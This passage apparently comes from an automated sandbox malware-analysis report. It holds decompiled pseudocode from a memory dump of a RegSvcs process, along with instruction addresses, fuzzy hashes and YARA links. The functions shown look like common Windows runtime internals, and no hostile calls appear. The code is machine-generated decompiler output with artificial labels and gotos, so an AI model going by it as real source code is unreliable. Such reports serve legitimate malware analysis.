								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00A84A2C(0xb36e40, 0xa84b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00A67D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xa25c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00A7F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00A7F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00AC7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00A62400(_t267 + 0x20);
															}
															L00A62400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00A72397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00A62280(_t134, 0xb38608);
									__eflags =  *0xb36e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00A5FFB0(_t198, _t241, 0xb38608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xb36e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xb38608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00A76B90(_t210,  &_v64);
										_t262 =  *0xb38608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00A7E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00A897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00A8006A(0xb38608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xb38608);
												E00A8B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xb36904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xb36e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00A5FFB0(_t198, _t240, 0xb38608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00A800C2(0xb38608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x00a720a0
0x00a720a8
0x00a720ad
0x00a720b3
0x00a720b8
0x00a720c2
0x00a720c7
0x00a720cb
0x00a720d2
0x00a72263
0x00a72266
0x00ab5836
0x00ab5836
0x00000000
0x00a7226c
0x00a7226c
0x00a72270
0x00a72274
0x00a720e2
0x00a720e2
0x00a720e6
0x00a720ee
0x00ab57dc
0x00ab57de
0x00ab57ec
0x00ab57ec
0x00ab57f1
0x00ab57f3
0x00ab57f8
0x00000000
0x00ab57f8
0x00ab57e0
0x00ab57e4
0x00ab57ea
0x00000000
0x00000000
0x00000000
0x00ab57ea
0x00a720f4
0x00a720f4
0x00a720f8
0x00a720f8
0x00a720fc
0x00a72100
0x00a72106
0x00a72201
0x00a72206
0x00a7220b
0x00a7220e
0x00a722a9
0x00a722ac
0x00000000
0x00000000
0x00a722b2
0x00a722b5
0x00ab5801
0x00ab5806
0x00000000
0x00000000
0x00ab5810
0x00ab5815
0x00ab5818
0x00000000
0x00000000
0x00ab581e
0x00a722bb
0x00a722bb
0x00a72218
0x00a72218
0x00a7221c
0x00a72220
0x00a72222
0x00a722c2
0x00a722c4
0x00a722dc
0x00a722dc
0x00a722e1
0x00000000
0x00000000
0x00000000
0x00a722e7
0x00a722c8
0x00a722cd
0x00a722d3
0x00a722d6
0x00ab5823
0x00ab5825
0x00ab5827
0x00000000
0x00000000
0x00ab582d
0x00000000
0x00ab582d
0x00000000
0x00a72228
0x00a72228
0x00000000
0x00a72228
0x00a72222
0x00a72214
0x00a72214
0x00000000
0x00a72114
0x00a72114
0x00a72114
0x00a7211a
0x00a7211c
0x00a72348
0x00a7234d
0x00ab5840
0x00ab5845
0x00ab5848
0x00ab584e
0x00ab584e
0x00ab5848
0x00a72353
0x00a72355
0x00a72388
0x00a72388
0x00a72368
0x00a7236a
0x00a7236c
0x00a7238f
0x00000000
0x00a7236e
0x00a7236e
0x00a7218e
0x00a7218e
0x00a72191
0x00a72195
0x00ab5a03
0x00ab5a06
0x00ab5a0c
0x00ab5a0f
0x00ab5a11
0x00ab5a13
0x00ab5a13
0x00ab5a19
0x00ab5a1f
0x00000000
0x00a7219b
0x00a7219b
0x00a721a0
0x00a72282
0x00a72284
0x00a72284
0x00a72284
0x00a72284
0x00a721a6
0x00a721a9
0x00a721ac
0x00a721ae
0x00a721b3
0x00a7228b
0x00a72290
0x00a72379
0x00a72296
0x00a72298
0x00a72298
0x00a72290
0x00a721b9
0x00a721be
0x00a722a2
0x00a722a2
0x00a721c4
0x00a721c8
0x00a721cc
0x00a721d0
0x00a721d4
0x00a721de
0x00a721e3
0x00ab5a29
0x00ab5a2c
0x00000000
0x00000000
0x00ab5a3b
0x00000000
0x00a721e9
0x00a721e9
0x00a721e9
0x00a721ee
0x00a721f1
0x00ab5a45
0x00ab5a4b
0x00ab5a52
0x00ab5a58
0x00ab5a5d
0x00ab5a5f
0x00ab5a71
0x00ab5a61
0x00ab5a6a
0x00ab5a6a
0x00ab5a76
0x00ab5a79
0x00ab5a7f
0x00ab5a83
0x00ab5a85
0x00ab5a87
0x00ab5a87
0x00ab5a8c
0x00ab5a91
0x00ab5a97
0x00ab5a9f
0x00ab5aa0
0x00ab5aa1
0x00ab5aa6
0x00ab5aab
0x00ab5ab1
0x00ab5ab3
0x00ab5ab9
0x00ab5aca
0x00ab5ad4
0x00ab5ad4
0x00ab5ade
0x00ab5ade
0x00ab5aab
0x00ab5a79
0x00ab5a52
0x00a721f7
0x00a721f9
0x00a721fe
0x00a721fe
0x00a721e3
0x00a72195
0x00a7236c
0x00a72122
0x00a72122
0x00a72124
0x00a72231
0x00a72236
0x00a72236
0x00a72238
0x00a72238
0x00a72240
0x00a72242
0x00a72244
0x00ab59fc
0x00a7218c
0x00a7218c
0x00000000
0x00a7218c
0x00a7224a
0x00a7224f
0x00a72256
0x00a72304
0x00a72309
0x00a7230f
0x00a7231e
0x00a7231e
0x00a7231e
0x00a72320
0x00a72325
0x00a7232a
0x00a7232c
0x00a7233e
0x00a7233e
0x00000000
0x00a7232c
0x00a72311
0x00a72317
0x00a7231a
0x00a7231c
0x00a72380
0x00a72380
0x00a72380
0x00a72384
0x00000000
0x00000000
0x00a72386
0x00000000
0x00a7231c
0x00a7225c
0x00a7225c
0x00000000
0x00a7225c
0x00a7212a
0x00a72134
0x00a72138
0x00a7213d
0x00ab5858
0x00ab5863
0x00ab5863
0x00ab5867
0x00ab586a
0x00000000
0x00000000
0x00ab586c
0x00ab586c
0x00ab5871
0x00ab5875
0x00ab5877
0x00ab5997
0x00ab599c
0x00ab59a1
0x00ab59a7
0x00ab59a7
0x00000000
0x00ab59a7
0x00ab587d
0x00000000
0x00ab588b
0x00ab588b
0x00ab5890
0x00ab5892
0x00ab5894
0x00ab5899
0x00ab589b
0x00ab58a0
0x00ab58a0
0x00ab58aa
0x00ab58b2
0x00ab58b6
0x00ab58be
0x00ab58c6
0x00ab58c9
0x00ab590d
0x00ab5917
0x00ab591a
0x00ab591c
0x00ab5920
0x00ab5928
0x00ab592a
0x00ab592c
0x00ab592e
0x00ab592e
0x00ab58cb
0x00ab58cd
0x00ab58d8
0x00ab58e0
0x00ab58f4
0x00ab58fe
0x00ab58fe
0x00ab593a
0x00ab593e
0x00ab5940
0x00ab5942
0x00000000
0x00ab5944
0x00ab5944
0x00ab5949
0x00ab594e
0x00ab594e
0x00ab5953
0x00ab595b
0x00ab5976
0x00ab5976
0x00ab597a
0x00ab597f
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab5981
0x00ab5981
0x00ab5981
0x00ab5983
0x00ab5988
0x00ab598d
0x00ab5991
0x00ab5991
0x00000000
0x00ab595d
0x00ab595d
0x00ab5963
0x00ab5965
0x00000000
0x00000000
0x00000000
0x00000000
0x00ab5967
0x00ab5967
0x00ab596b
0x00ab596d
0x00000000
0x00000000
0x00ab596f
0x00ab5971
0x00ab5971
0x00ab5974
0x00000000
0x00000000
0x00000000
0x00ab5974
0x00000000
0x00ab5967
0x00ab595b
0x00ab5942
0x00ab5863
0x00a72143
0x00a72143
0x00a72149
0x00a7214f
0x00a722f1
0x00a722f6
0x00000000
0x00a72173
0x00a72173
0x00a7217d
0x00a72181
0x00a72186
0x00ab59ae
0x00ab59b2
0x00ab59b5
0x00ab59b7
0x00ab59ba
0x00ab59cd
0x00ab59d1
0x00ab59d5
0x00ab59d9
0x00ab59db
0x00000000
0x00000000
0x00ab59dd
0x00ab59dd
0x00ab59e1
0x00ab59e4
0x00ab59e7
0x00ab59ee
0x00ab59ee
0x00ab59f3
0x00ab59f3
0x00000000
0x00a72186
0x00a7214f
0x00a72106
0x00a72266
0x00a720d8
0x00a720da
0x00a720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e1d0aa3e380b29eeba2c8454ba5c32163cac6ee1bc634f4628bb7cf7404d04
Instruction ID: 2f96ca13cce541c4289d99113a4f59f6166cbc890de0516e65a9373aa78c1a52
Opcode Fuzzy Hash: b6e1d0aa3e380b29eeba2c8454ba5c32163cac6ee1bc634f4628bb7cf7404d04
Instruction Fuzzy Hash: 4FF1FF31A087419FD725CF28C8407AAB7E5BF95324F18C62DF8999B292D734DC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A5849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00A5849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xb1f9c0);
				E00A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0xb37b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00A5CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00A62280( *[fs:0x30], 0xb38550);
						_t139 =  *0xb37b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00A7F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00A5FFB0(_t193, _t235, 0xb38550);
								L5:
								return E00A9D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00A41C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0xb37b9c; // 0x0
							_t235 = L00A64620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0xb37b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00A7A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00A5FFB0(_t193, _t235, 0xb38550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00A677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00A677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0xb37b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0xb37b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00A837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0xb37b9c; // 0x0
									_t214 = L00A64620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00A837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0xb37b10 =  *0xb37b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0xb37b04 =  *0xb37b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00A677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00A677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0xb37b08 =  *0xb37b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00A857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00A8F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00A677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00A7A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00A677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00A896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x00a5849b
0x00a5849b
0x00a5849b
0x00a5849b
0x00a5849d
0x00a584a2
0x00a584a7
0x00a584b1
0x00a584d8
0x00000000
0x00a584b3
0x00a584c4
0x00a584c9
0x00a584cd
0x00a584cf
0x00a584cf
0x00a584d6
0x00a584e6
0x00a584e9
0x00a584ec
0x00a584ef
0x00a584f2
0x00a584f4
0x00a584fc
0x00a58501
0x00a58506
0x00a58509
0x00a586e0
0x00a586e5
0x00a586e8
0x00a586ed
0x00a586f0
0x00a586f2
0x00aa9afd
0x00aa9b02
0x00a584da
0x00a584df
0x00a584df
0x00a586fa
0x00a586fd
0x00a586fe
0x00a58701
0x00a58706
0x00a58709
0x00a5870b
0x00000000
0x00000000
0x00a58711
0x00a58725
0x00a58727
0x00a5872a
0x00a5872c
0x00aa9af0
0x00aa9af5
0x00a58732
0x00a58732
0x00a58732
0x00a58735
0x00a58737
0x00a58515
0x00a58515
0x00a58518
0x00a5851d
0x00a58523
0x00a58527
0x00a5852b
0x00a58537
0x00a58539
0x00a5853c
0x00a5853e
0x00a5868c
0x00a58691
0x00a58699
0x00a5869b
0x00a58744
0x00a58748
0x00a586a1
0x00a586a1
0x00a586a1
0x00a586a4
0x00a586a8
0x00aa9bdf
0x00aa9bdf
0x00a586ae
0x00a586b0
0x00000000
0x00a586b6
0x00000000
0x00aa9be9
0x00a586b0
0x00a58544
0x00a5854a
0x00a5854d
0x00a58551
0x00a5876e
0x00a58778
0x00a5877b
0x00a58780
0x00a58557
0x00a58557
0x00a5855d
0x00a5855d
0x00a5856b
0x00a5856e
0x00a58570
0x00a58573
0x00a58576
0x00a58576
0x00a58579
0x00a5857b
0x00000000
0x00000000
0x00a58581
0x00a585a0
0x00a585a2
0x00a585a5
0x00a585a7
0x00aa9b1b
0x00aa9b1b
0x00a5862e
0x00a5862e
0x00a58631
0x00a58631
0x00a58634
0x00a58636
0x00a58669
0x00a58669
0x00a5866b
0x00aa9bbf
0x00aa9bc4
0x00aa9bc8
0x00aa9bce
0x00aa9bce
0x00a58671
0x00a58671
0x00a58674
0x00a58676
0x00aa9bae
0x00aa9bae
0x00a58676
0x00a5867c
0x00a5867e
0x00a58688
0x00a58688
0x00000000
0x00a5867e
0x00a58638
0x00a58638
0x00a5863b
0x00a5863e
0x00a5863f
0x00a58642
0x00a58645
0x00a58648
0x00a5864d
0x00aa9b69
0x00aa9b6e
0x00aa9b7b
0x00aa9b81
0x00aa9b85
0x00aa9b89
0x00aa9ba7
0x00aa9b8b
0x00aa9b91
0x00aa9b9a
0x00aa9b9f
0x00aa9b9f
0x00a58788
0x00a5878d
0x00a58763
0x00a58763
0x00a58766
0x00000000
0x00a58766
0x00aa9b70
0x00000000
0x00aa9b70
0x00a58656
0x00a5865a
0x00a5865c
0x00a58752
0x00a58756
0x00000000
0x00000000
0x00a5875e
0x00000000
0x00a5875e
0x00a58662
0x00a58662
0x00a58662
0x00a58666
0x00000000
0x00a58666
0x00a585b7
0x00a585b9
0x00a585bc
0x00a585bf
0x00a585cc
0x00a585d1
0x00a585d4
0x00a585db
0x00a585de
0x00a585e0
0x00aa9b5f
0x00000000
0x00aa9b5f
0x00a585e6
0x00a585ea
0x00a586c3
0x00a586c5
0x00a586c8
0x00a586ca
0x00aa9b16
0x00000000
0x00aa9b16
0x00a586d6
0x00a585f6
0x00a585f6
0x00a585f9
0x00a58602
0x00a58606
0x00a5860a
0x00a5860b
0x00a5860e
0x00a58611
0x00000000
0x00a58611
0x00a585f3
0x00000000
0x00a585f3
0x00a58619
0x00a5861e
0x00a5861e
0x00a58621
0x00a58622
0x00a58623
0x00a58625
0x00a5862c
0x00000000
0x00a5873d
0x00000000
0x00a5873d
0x00a58737
0x00a5850f
0x00a58512
0x00000000
0x00a58512
0x00000000
0x00a584d6

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c9b61f381197672cedff31787e0d906f06c63b9297750b610b4e1c74209b51
Instruction ID: 91627af5ae1722871ecc7c15261ba01529c49bb1fe14fb4cfc14c6f06787715b
Opcode Fuzzy Hash: 71c9b61f381197672cedff31787e0d906f06c63b9297750b610b4e1c74209b51
Instruction Fuzzy Hash: 27B16DB0E04209DFCB14DFA9C990AAEFBB5FF49305F20412AE805AB755DB74AD49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A7513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A7513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
